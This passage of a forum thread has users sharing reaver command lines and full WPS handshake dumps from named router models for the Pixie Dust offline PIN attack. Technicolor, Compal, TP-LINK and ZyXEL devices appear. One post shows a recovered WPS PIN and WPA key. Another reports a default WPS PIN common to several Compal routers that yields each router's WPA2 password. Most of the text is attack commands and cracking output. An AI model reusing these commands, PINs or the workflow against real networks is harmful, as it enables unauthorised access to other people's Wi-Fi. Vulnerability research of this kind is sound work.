    Cmd : reaver -i mon0 -b A6:25:89:XX:XX:XX -c 1 -s y -p 99280710
    
    [Reaver Test] BSSID: A6:25:89:XX:XX:XX
    [Reaver Test] Channel: 1
    [Reaver Test] [+] WPS PIN: '99280710'
    [Reaver Test] [+] WPA PSK: '18D189E728'
    [Reaver Test] [+] AP SSID: 'TNCAPxxxxxx'
    ..But not on TD5130 v1 :

    Code:
    wifislax ~ # reaver -i mon0 -b 00:18:E7:XX:XX:XX -c 1 -K 3 -P
    
    Reaver v1.5.2 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
    mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212
    
    [+] Waiting for beacon from 00:18:E7:XX:XX:XX
    [+] Associated with 00:18:E7:XX:XX:XX (ESSID: TNCAPxxxxxx)
    [+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
    [P] E-Nonce: 55:b3:65:81:7c:d3:2a:9b:72:bf:d2:23:58:93:d9:88
    [P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b
    [P] WPS Manufacturer: Technicolor
    [P] WPS Model Number: Technicolor TD5
    [P] Access Point Serial Number: 1209A1D12783
    [P] PKR: 2f:97:c1:c5:de:cd:d7:b5:15:ef:8d:bb:e1:53:7c:9f:5c:3d:d2:48:63:a2:d2:ec:1b:88:69:27:44:d2:be:4f:b6:a6:b8:07:5b:10:8c:a1:a7:01:ea:b7:f0:71:a9:90:31:78:f4:16:8f:4b:6b:0a:89:48:70:18:ad:93:f7:a7:4f:46:37:ee:50:cb:64:5f:c6:ec:a4:10:5f:ef:a5:90:0c:3b:e3:b3:50:e9:2a:6b:ea:ce:b4:c4:7f:51:be:ae:59:45:a8:17:a3:8e:9f:6a:05:9e:6f:8b:76:c4:30:9f:bc:c1:b6:76:2b:6d:dd:4e:3b:26:6c:c9:f5:eb:c6:49:eb:9d:a3:ae:64:5a:f5:87:88:46:ff:30:3e:87:1a:e0:12:89:81:7f:6e:f3:a2:8b:f5:66:47:66:ab:71:0b:1f:4d:de:9f:d9:d7:c4:cc:c5:73:65:93:75:dd:89:ec:43:b0:2e:7e:51:46:1f:79:ee:70:4b:de:26:8a:21:6c:99
    [P] AuthKey: f1:63:8a:98:70:5b:6b:9b:fc:e5:f7:69:c9:a8:fd:01:9c:b8:81:e9:c7:07:44:60:98:f1:c1:70:62:d0:65:f4
    [P] E-Nonce: 5f:a2:06:2d:1c:01:6b:cc:67:7e:f6:e7:53:df:38:01
    [P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b
    [P] WPS Manufacturer: Technicolor
    [P] WPS Model Number: Technicolor TD5
    [P] Access Point Serial Number: 1209A1D12783
    [P] PKR: 1e:4c:22:6d:a7:ce:f8:b7:d0:16:83:76:33:6b:8f:4f:b1:9e:6c:8a:a6:7d:6a:4a:14:8e:4e:5b:2e:fa:e5:4e:a1:b2:d0:a0:65:75:16:a6:10:60:27:8d:31:74:4b:e1:4e:0e:18:2d:f2:ae:10:3f:2f:14:ff:51:75:24:8b:d3:6a:a4:23:72:7d:d8:bb:63:6b:89:c9:22:0f:32:e3:1b:bb:2b:b6:3c:8a:b3:4f:c7:a1:4b:fc:d2:4c:73:9c:1d:3f:ae:6d:aa:3f:f0:a0:84:51:e2:1f:ca:91:f5:89:44:47:48:3c:23:6e:e0:b5:22:f3:c7:9c:db:3f:91:82:78:9f:73:4a:dd:38:00:f4:ee:a9:4f:ce:4a:4c:e8:3f:87:9f:e6:3a:a9:07:90:31:05:09:a7:7d:3f:e6:03:70:44:61:f8:20:cc:47:c3:15:dd:50:52:54:ee:99:c4:85:7e:8a:64:8f:0f:60:16:3a:ed:3c:8d:d9:17:3e:ca:22:62
    [P] AuthKey: f7:94:e0:53:05:c6:92:37:13:8c:d8:04:54:3a:42:5e:5f:8f:4f:28:ae:7a:51:9e:91:3e:69:e8:f6:c8:68:43
    [P] E-Hash1: 51:6d:e5:bc:37:d0:ae:bb:de:b8:6d:91:40:b4:55:1a:c0:15:a1:32:29:1a:c3:66:9f:3e:6f:38:39:3c:ee:95
    [P] E-Hash2: c5:e2:df:28:ed:50:8d:69:31:e9:85:9e:1b:68:12:18:cf:c7:1f:f7:f8:41:f4:01:b3:5a:8e:83:a3:24:9e:96
    [Pixie-Dust]  
    [Pixie-Dust]   [-] WPS pin not found!
    [Pixie-Dust]  
    [Pixie-Dust][*] Time taken: 1 s
    So we're waiting for a new update of Pixie, and I hope it'll be very soon...

  26. #276
    Join Date
    2015-Apr
    Posts
    5
    pixiewps inst installing.
    it shows problem in line 46:26
    after that it also halts on 'SHA1' line.
    any way to solve it...???
    im running kali in live

  27. #277
    Join Date
    2015-Apr
    Posts
    15
    Quote Originally Posted by someone_else View Post
    some updates for the database ;-)


    Compal CH6640E
    Realtek RTL8192CE

    After successful PIN-Test reaver brings for PSK + SSID "(null)" ?
    So, what else, its some kind of VULNERABLE .

    Code:
    [P] E-Nonce: 07:ee:41:56:16:0a:54:d7:0d:c7:1e:a9:43:83:c1:a0
    [P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b
    [P] PKR: c6:5a:4c:48:87:b9:24:fb:b3:f8:0f:de:b4:4c:cc:82:23:cf:6c:55:2b:4c:d8:a3:a8:c8:a8:da:aa:ba:28:ab:c8:95:d1:aa:04:a2:10:f8:01:31:62:40:46:e0:cc:a8:6c:07:9a:8c:5f:5c:1e:c5:13:53:c7:69:cc:55:ce:0a:de:38:27:a1:9c:75:e5:09:e9:55:71:5e:60:3d:e7:a4:6f:88:60:4e:da:8e:de:c3:74:48:fb:ad:8a:16:77:2b:0d:4f:d6:cc:5d:85:0e:59:44:a9:de:3f:85:a1:49:80:ec:88:79:b2:4e:00:8a:6b:a5:db:27:62:3c:59:d8:e9:8f:f4:3e:09:76:74:5f:10:99:d1:33:39:69:a7:c6:2a:aa:60:29:1b:9c:5f:4f:d4:b2:a2:08:cd:67:d0:de:59:12:be:24:9e:69:6e:f0:a7:6b:70:2d:4f:db:5a:b5:cb:36:2b:44:4a:c7:e0:42:50:a8:6c:d4:a5:da:e4:46:51
    [P] AuthKey: a1:3d:2a:8b:ce:3a:27:e2:09:11:f8:63:e4:95:c1:c9:18:0e:2a:9b:fa:f1:06:b4:88:a0:d4:63:98:04:44:f5
    [P] E-Hash1: 5c:b7:48:b9:b2:cc:1f:5b:17:5b:f3:c6:ce:ca:83:c1:9e:c2:08:f6:bf:35:de:3f:cd:0f:34:80:b9:6e:16:51
    [P] E-Hash2: 45:2a:e1:1e:2e:f7:c9:9d:a2:7a:c3:d8:c0:02:0e:aa:2d:f8:18:2d:28:61:78:93:bd:e2:a2:09:31:f3:f5:1e
    @Soxrok2212
    some Information about the Compal-Device. Testet with 8 Devices, each of them has the same Pin 47385580 which leads (with friendly Help from Bully) to the correct WPA2-Key (which was different in all 8 cases).

  28. #278
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Do me a favor, because this isn't the first time I've seen such a thing. Log into one of them and look under the WPS settings... tell me if a different PIN is also listed there and then try it in reaver/bully Please

  29. #279
    Join Date
    2015-Apr
    Posts
    15
    Quote Originally Posted by soxrok2212 View Post
    Do me a favor, because this isn't the first time I've seen such a thing. Log into one of them and look under the WPS settings... tell me if a different PIN is also listed there and then try it in reaver/bully Please
    Hi,
    checked three of them, each one has as Default-PIN 47385580 in WPS Settings.
    For 7 Models with Reaver --> PSK + SSID "(null)", only one shows SSID and PSK. Bully delivers both Values correctly.
    Btw: In your Pixie-Database is a second Compal-Device listed (CBN-106-145-065). Those CBN-xxx-xxx-xxx number is different at each Router i've tested. So its probably the same Model.

    Here are 5 of them:

    Code:
    [P] E-Nonce: 74:d4:79:d4:5f:37:5d:a2:55:95:b3:8e:3e:b4:42:b0
    [P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b
    [P] PKR: b7:b5:92:8b:37:23:d1:97:30:cc:fd:86:06:88:40:05:ee:d9:d3:50:9e:4b:04:1a:c7:ce:2a:43:73:69:79:74:eb:ca:03:4d:c4:01:c2:1d:2d:54:df:11:89:ad:23:6b:63:15:c0:d2:80:32:29:38:a8:3f:27:34:85:8e:7e:f3:5d:48:1d:51:3f:36:3d:fa:0b:bf:3e:4c:69:9c:0e:15:ed:0c:f2:06:39:a6:44:df:07:26:0d:c3:97:f8:02:9f:3c:c0:7c:ae:e1:63:82:f3:e6:11:7c:08:86:cd:11:17:28:d3:df:fe:ea:9a:bf:b6:04:23:62:a9:69:52:2c:be:f8:47:84:b8:29:1e:34:ab:ae:73:e5:b2:5c:d9:7e:15:0a:67:4f:9e:b8:f5:ab:02:6c:42:51:70:f9:75:17:1f:0b:14:9b:2b:47:15:7f:0c:c7:93:f1:bc:55:21:fe:7e:e7:43:17:f3:dd:28:3c:3f:09:a8:f9:e5:2b:30:46:a0
    [P] AuthKey: 17:c4:8c:1c:30:2d:b7:07:95:19:7e:d7:dc:cb:c5:c2:54:31:c2:98:81:4c:e3:61:7e:6e:1f:8e:01:44:af:41
    [P] E-Hash1: 29:ee:d1:39:09:2f:ed:6c:b6:fe:3f:d9:7e:65:42:1a:a9:bb:5f:09:92:5f:4a:13:de:71:15:0c:39:62:f7:b2
    [P] E-Hash2: ad:14:f5:b9:34:99:c7:99:17:2f:b2:d4:fb:d2:52:af:dc:04:61:54:69:d6:a3:47:55:e8:20:37:d2:23:7c:7a
    Code:
    [P] E-Nonce: 76:fd:23:67:28:98:00:14:74:08:2c:e2:58:e6:08:7b
    [P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b
    [P] PKR: f1:0e:83:37:1e:6d:29:4a:ef:30:56:56:ef:75:6c:e4:b9:43:e1:27:e6:e8:52:cd:ed:e3:fa:9f:0d:08:15:bc:90:ac:94:2f:c9:85:c3:0d:f3:3b:cb:56:ad:5d:74:01:05:1c:9e:43:60:74:62:79:0e:5e:6d:b5:5e:e6:06:b6:8c:b5:7e:d0:eb:ed:17:6a:76:ca:aa:c2:f5:0e:8c:b7:da:e6:3a:ba:f9:1d:04:34:92:fc:91:0c:8c:e5:bb:70:58:22:95:34:85:54:ba:c3:cb:d7:c6:3e:65:d1:0f:91:0d:b9:d2:98:cc:a8:25:db:d8:0a:c9:f0:40:5f:4c:36:84:1a:f6:83:3a:5b:82:1e:44:d0:be:b8:29:ad:1f:0d:8b:bb:29:b8:7f:4d:12:0f:c7:c6:50:b0:2b:97:16:4a:89:b5:7c:cd:06:ab:03:59:4d:fe:3c:b9:7e:35:24:fc:24:b2:4a:67:c8:3c:b3:6e:7b:45:e9:d2:36:bf:02:9f
    [P] AuthKey: 5a:90:d3:1a:7f:0a:24:a5:3d:29:47:c5:b9:ca:65:83:86:e0:9a:76:75:3c:47:e3:28:b6:1c:33:95:1e:ee:e4
    [P] E-Hash1: 7b:ff:91:d0:ca:6f:c1:c6:c0:fb:5f:a6:21:27:54:1b:1b:1f:60:82:53:8f:26:f7:d8:55:4d:1e:49:1a:6a:6e
    [P] E-Hash2: 79:8f:b2:12:da:68:b0:3d:89:8b:80:b3:43:cb:9f:f0:2c:c2:50:ec:30:dd:19:78:8d:b7:83:a0:27:df:5d:eb
    Code:
    [P] E-Nonce: 45:2a:2b:5c:25:9d:91:39:42:e9:38:7c:7a:d1:1b:1c
    [P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b
    [P] PKR: ac:1c:fa:9e:2a:80:76:e8:40:44:ff:9e:a3:6a:3a:c0:6d:8b:92:53:bf:98:ae:7a:22:60:c5:22:3f:40:a3:aa:16:19:37:76:dc:5f:49:67:ac:2b:4d:a6:b1:3e:87:7c:a4:b0:3b:55:56:88:75:b5:a9:e6:a9:55:c0:26:eb:68:f7:5d:84:06:c7:77:e5:55:fa:49:fe:45:03:84:2c:5d:bc:b9:76:99:f8:93:32:73:2c:2a:a7:0d:eb:1d:4c:3d:2a:7e:a7:a0:62:ee:51:1a:f8:39:f5:33:40:71:1b:10:18:39:da:27:b4:5b:3a:75:6e:86:45:92:a1:df:fe:75:2a:27:98:28:1e:a7:cc:a9:b3:58:2d:c8:14:33:80:55:3d:ac:f0:bf:65:a7:05:f3:6d:90:2c:0e:4f:29:95:b7:dc:49:f9:58:9e:1c:7d:d8:07:d7:c1:f3:8c:4b:4d:98:a1:0d:01:0e:5a:4d:66:26:09:73:d1:02:03:f7:16:8c
    [P] AuthKey: 5a:3d:0b:a3:41:42:b2:8f:18:35:1f:a9:b3:be:45:1f:ef:a7:0d:32:f0:3d:06:59:51:bb:8a:b2:e1:26:eb:5f
    [P] E-Hash1: b3:a9:37:ba:30:37:d7:65:d0:6e:5e:93:a1:60:0f:9f:7d:2f:f6:7c:1b:80:3e:72:84:fa:84:5b:9d:63:0f:06
    [P] E-Hash2: 98:16:a7:fc:8c:0c:ce:1c:2c:58:dd:8e:1b:b1:92:ac:ca:4b:56:df:9e:0c:d3:9c:89:da:e7:7f:90:9e:83:d3
    Code:
    [P] E-Nonce: 14:d1:e7:b1:50:ea:91:a3:0f:8b:e5:97:63:61:ef:3c
    [P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b
    [P] PKR: f5:a3:7d:0a:de:b7:c1:a1:ea:16:72:04:be:41:a6:7b:d6:ce:52:d1:7c:7f:42:51:f9:7d:04:6d:97:4c:97:0b:6b:18:02:fa:be:8a:3e:0c:aa:a1:82:b7:dd:3b:9b:e3:c8:60:13:b6:8f:e8:c9:8f:69:2b:49:1c:e6:53:c8:1e:af:03:4f:d7:d1:1c:a4:52:96:91:18:66:45:6c:0b:29:61:c4:8b:13:71:d5:ee:bd:53:19:63:6e:65:3d:47:5e:ed:73:75:15:39:b2:e8:13:69:fd:3c:0f:b1:e3:17:53:1a:84:93:33:81:64:01:9b:d5:99:0f:c4:a2:20:63:1e:d6:15:2b:36:f8:e0:11:ef:3a:3d:8a:b9:71:78:a1:49:a2:be:23:83:79:bd:d8:8e:8a:90:21:ce:4a:c9:08:07:b8:b7:cf:e4:0d:2c:bd:9e:38:bd:48:13:97:02:72:ef:b6:95:22:82:b5:e0:ff:ba:a4:4c:f1:93:69:90:d5:27
    [P] AuthKey: 44:65:47:ff:b9:02:fe:58:58:16:54:30:15:a5:10:c1:50:1c:04:3c:d6:d2:07:a5:73:54:93:a8:0b:4b:3b:90
    [P] E-Hash1: 3a:4b:c9:1c:51:f9:6a:c5:26:3c:ba:41:2d:06:c9:62:85:4a:5f:6a:16:17:a5:40:9a:6e:b6:13:1b:48:01:28
    [P] E-Hash2: db:00:8d:a9:86:2f:14:12:4a:ee:23:e3:50:8b:1a:d3:c4:da:39:09:d8:55:07:7d:53:a3:3f:19:3e:ce:65:1c
    Code:
    [P] E-Nonce: 3c:d0:62:c2:3b:83:41:84:5a:bc:d5:92:40:b4:ac:45
    [P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b
    [P] PKR: 8b:19:f7:8c:50:67:a3:b9:ec:61:ba:b1:a6:e5:6b:94:37:89:46:b3:3c:68:62:16:57:bc:f6:00:fe:20:a6:63:82:65:f5:ac:c0:29:96:89:d0:03:8d:ed:06:b2:f7:28:00:5d:6b:fc:76:d0:f6:1c:53:a4:17:46:9b:f9:64:69:bd:a4:0e:bd:b7:32:fc:a7:7c:cc:2f:dc:2e:73:45:71:b7:46:82:4d:ec:ab:5e:d9:04:1d:a6:a0:12:63:5e:a8:da:ee:2f:15:d7:6b:9e:23:51:2b:bd:f3:a0:4d:53:55:b0:8b:a8:8f:e5:ec:cd:8b:c6:b3:7f:a0:8d:9a:4d:ea:7b:b9:5c:a2:0b:cd:f7:b7:4c:ad:c8:0c:b6:c4:21:c2:4e:91:b9:19:13:65:1c:9a:bb:0e:b5:f7:3f:92:eb:c3:4b:21:11:47:31:2a:46:06:2f:4e:9a:0d:2a:0c:37:67:17:a8:0f:06:b2:1f:19:c6:f7:25:7f:c1:c0:16:0f:48
    [P] AuthKey: 0c:a1:7a:6a:da:34:42:18:96:8d:dd:8d:61:98:05:a2:ac:6f:15:4f:2c:8b:70:d3:54:2f:c2:32:06:db:52:96
    [P] E-Hash1: 29:c1:bb:a1:23:c4:69:fa:0d:56:46:98:61:51:c0:8f:60:fb:fd:5f:0f:d1:d0:1a:df:56:d1:d5:12:e7:71:5d
    [P] E-Hash2: 62:0b:ad:55:b2:3d:1d:b8:bf:e4:39:27:59:1d:43:47:12:3f:82:22:66:32:87:7a:a8:ec:c2:52:0b:13:f2:b6
    Last edited by someone_else; 2015-04-25 at 12:32.

  30. #280
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Alright thanks... there was no other pin listed?

  31. #281
    Join Date
    2015-Apr
    Posts
    28
    .

    Now , I have an information about F8:1A:67:XX:XX:XX mac adress (RTL 8671 ev 2006 07 27 chipset of TPLINK modems)

    This mac adresses are mask ...F8:1A:67 is mask , FA:1A:67 orjinal mac..
    Last edited by Saydamination; 2015-04-25 at 15:41. Reason: other reasons

  32. #282
    Join Date
    2015-Apr
    Posts
    15
    Quote Originally Posted by soxrok2212 View Post
    Alright thanks... there was no other pin listed?
    nope. Don't know, if this is ISP/Country specific, but (again) all testet Routers have the same PIN.

    Here is the User-Manual, the WPS Menu is described on page 50.

  33. #283
    Join Date
    2014-Oct
    Posts
    44
    if it's any use for anyone

    TP-LINK TL-WR841ND v8.x
    WI1 chip1: Atheros AR9341

    Code:
    [P] E-Nonce: b0:74:6b:86:dd:ed:47:b7:63:2b:4c:12:12:d5:c1:4e
    [P] PKE: cb:8b:ce:5a:3e:49:e1:f6:02:75:c2:cb:c4:cd:bb:48:1e:a0:e8:ea:95:85:c3:62:6c:c1:ec:e3:58:01:54:8b:55:f2:34:59:34:4a:3d:22:26:44:76:42:60:b8:a2:41:40:38:db:17:b1:0d:92:81:f5:c2:31:b4:d9:b1:50:41:70:5b:ce:58:34:3c:83:7a:99:26:66:da:be:6b:ab:87:45:ea:2a:b3:11:9a:b0:de:73:df:9f:65:24:3d:75:cd:f7:63:8a:d7:9f:21:ae:60:63:fd:1c:0a:62:e1:6c:63:cc:4a:63:1a:aa:e3:28:c5:88:d7:7e:49:53:1b:be:7a:2c:d7:2c:1b:bf:72:74:29:3e:5a:77:e7:ad:55:bd:84:6b:dd:0a:56:81:ce:e4:10:d0:ab:16:9a:2a:f8:bc:92:52:30:4f:f1:74:9e:48:fd:2e:ea:01:de:f9:96:3d:75:67:c5:74:53:c2:37:06:13:8e:5f:c5:59:15:28:15:dc
    [P] WPS Manufacturer: TP-LINK
    [P] WPS Model Number: 8.0
    [P] WPS Model Serial Number: 1.0
    [+] Received M1 message
    [P] PKR: 5c:a1:2f:f5:aa:4f:24:c2:c4:9b:b1:75:23:0b:66:63:50:d0:d3:33:7e:6d:28:01:1d:13:e4:04:d6:22:1b:a8:51:d9:33:fe:26:a6:00:f2:b0:b6:ef:fd:ea:8f:00:f9:23:ac:4a:a1:ec:ad:86:56:cf:62:2d:ea:74:f6:02:47:5f:e2:05:1c:19:2b:26:e0:33:fb:aa:3e:cc:e7:5f:4e:5f:f1:4f:c6:ff:71:ef:79:e1:ae:df:9c:4e:44:15:16:90:09:88:ba:0c:86:8e:87:12:13:d9:f6:ca:ac:d8:2b:be:41:8f:56:59:1b:12:22:16:e0:17:69:ee:9c:ce:c8:e4:b7:ca:1f:9c:71:8f:b0:2f:0e:c2:7d:80:41:ec:ed:d5:7c:d1:e8:0f:1d:36:0d:19:48:f1:71:e8:51:d4:31:87:d4:25:47:d9:2b:05:a6:44:0e:19:8c:fa:a9:96:3e:78:95:65:16:87:b3:7f:98:92:da:15:9c:5f:f5:44:f2
    [P] AuthKey: 6d:ad:39:70:41:85:d1:99:b2:c2:be:62:67:7b:2e:cb:be:ff:b2:d1:23:e3:63:0a:fb:1d:6c:75:ad:9b:82:84
    [+] Sending M2 message
    [P] E-Hash1: 3b:1c:a3:7d:df:eb:90:b0:af:20:bd:72:82:6a:ab:01:3e:93:39:22:10:ff:a2:07:59:c3:ba:00:31:3a:3c:f5
    [P] E-Hash2: ae:a5:9e:bc:13:53:aa:ce:7f:38:27:50:33:72:1a:c7:53:17:a1:59:12:57:e2:df:95:23:a0:4c:80:09:16:cd
    [Pixie-Dust]  
    [Pixie-Dust]   [-] WPS pin not found!
    [Pixie-Dust]  
    [Pixie-Dust][*] Time taken: 1 s

  34. #284
    Join Date
    2014-Oct
    Posts
    44
    Zyxel Keenetic vulnerable
    unknown chpset

    Code:
    [P] E-Nonce: 18:31:5b:b2:69:e3:1a:c1:55:8f:e5:6d:7d:41:9b:3b
    [P] PKE: 71:51:cd:92:d8:61:05:50:1e:15:15:6b:f1:a9:d8:5b:49:cf:a0:9e:9d:00:2a:7a:21:91:94:0e:ac:15:d3:44:58:2f:c8:61:3d:ce:f8:48:da:f6:ff:68:c2:8b:b5:20:61:e1:5d:8c:f2:57:60:a7:8f:3a:32:bf:69:5f:24:cc:e4:70:33:7f:12:3d:c6:88:02:ea:78:6b:9d:64:3f:b0:9d:68:65:e4:25:4e:e3:26:ab:73:ae:ea:b2:1c:6d:c6:b9:99:e0:7c:ea:18:56:3a:86:90:6e:78:a6:ea:6c:f6:6e:04:96:39:ef:04:2e:30:bc:96:c6:9f:1d:50:eb:82:a8:77:b6:b0:7b:43:bc:a6:57:75:62:93:64:7e:15:9d:14:96:e2:4c:9e:3c:71:31:ad:b9:e6:f5:5e:fe:98:85:ab:9e:3c:b3:d4:4d:5b:76:b6:f0:74:7b:ca:8c:d7:45:cc:b3:e6:93:a8:43:f8:1b:aa:f2:8c:35:47:68:cc:1b
    [P] WPS Manufacturer: ZyXEL Communications Corp.
    [P] WPS Model Number: KEENETIC series
    [P] WPS Model Serial Number: none
    [+] Received M1 message
